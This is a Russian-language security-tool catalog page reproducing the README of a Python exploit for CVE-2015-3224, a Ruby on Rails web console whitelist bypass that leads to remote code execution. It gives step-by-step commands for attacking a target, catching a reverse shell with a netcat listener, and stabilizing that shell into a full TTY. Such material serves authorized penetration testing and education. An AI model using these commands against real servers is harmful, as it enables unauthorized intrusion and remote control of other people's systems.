Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2015-3224 — Ruby on Rails Web Console Exploit (CVE-2015-3224) | Kitploit
Инструменты/GitHubGitHub/sic4rio/cve-2015-3224
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web Console Exploit (CVE-2015-3224)

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт веб-консоли Ruby on Rails (CVE-2015-3224)

CVE-2015-3224

Этот репозиторий содержит Python-скрипт для эксплуатации уязвимости обхода IP-белого списка в веб-консоли разработчика Ruby on Rails 4.0.x и 4.1.x. Скрипт позволяет выполнить удалённое выполнение кода на уязвимых серверах.

⚠️ Отказ от ответственности Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его на любой системе без явного разрешения. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.


📌 Описание уязвимости

Веб-консоль в уязвимых версиях Ruby on Rails предназначена для целей разработки и должна быть доступна только с доверенных IP-адресов. Однако из-за неправильной обработки HTTP-заголовка X-Forwarded-For злоумышленник может подделать свой IP-адрес, чтобы выглядеть как доверенный локальный пользователь (например, 127.0.0.1 или ::1). Это обходит белый список IP и предоставляет несанкционированный доступ к веб-консоли, что приводит к удалённому выполнению кода.


🚀 Возможности

  • Простота использования: Простой интерфейс командной строки.
  • Динамическое обнаружение пути: Автоматически проверяет цель для поиска динамического пути сессии консоли.
  • Два режима работы с оболочкой:
    • Простая оболочка: Базовая неинтерактивная оболочка для быстрых команд.
    • Реверс-оболочка TTY: Однострочная команда для получения полностью интерактивной реверс-оболочки PTY.
  • Улучшенная читаемость: Цветовое кодирование вывода для сообщений о статусе, успехах и ошибках.
  • Надёжность: Включает обработку ошибок для сетевых проблем и неудачных команд.

✅ Требования

  • Python 3
  • Библиотека requests

Установка requests:

root@kitploit:~
pip install requests

⚙️ Использование

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. Сделайте скрипт исполняемым:

    root@kitploit:~
    chmod +x exploit.py
    

Вариант 1: Простая интерактивная оболочка

Этот режим полезен для быстрого выполнения простых команд.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

Вариант 2: Полноценная интерактивная TTY (реверс-оболочка)

Это рекомендуемый режим для стабильной полностью интерактивной оболочки.

Шаг 1: Запустите слушатель

На вашей локальной машине откройте новый терминал и запустите слушатель netcat.

root@kitploit:~
nc -lvnp 9001

Шаг 2: Запустите эксплойт

В другом терминале запустите скрипт с флагом --rev-shell, указав ваш локальный IP (lhost) и порт (lport).

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

Шаг 3: Стабилизируйте оболочку

Подключение поступит на ваш слушатель netcat. Чтобы обновить его до полностью интерактивной TTY, выполните следующие шаги в окне netcat:

  1. Переведите оболочку в фоновый режим, нажав Ctrl+Z.
  2. Установите локальный терминал в сырой режим и верните оболочку на передний план.
    root@kitploit:~
    stty raw -echo; fg
    
    Нажмите Enter, если приглашение не появится.
  3. Установите свойства терминала на удалённой оболочке.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

Теперь у вас полностью функциональная и стабильная оболочка!


👥 Авторы

  • Оригинальный эксплойт: Eval (@0xEval)
  • Файл Readme.md: GPT
Скачать инструмент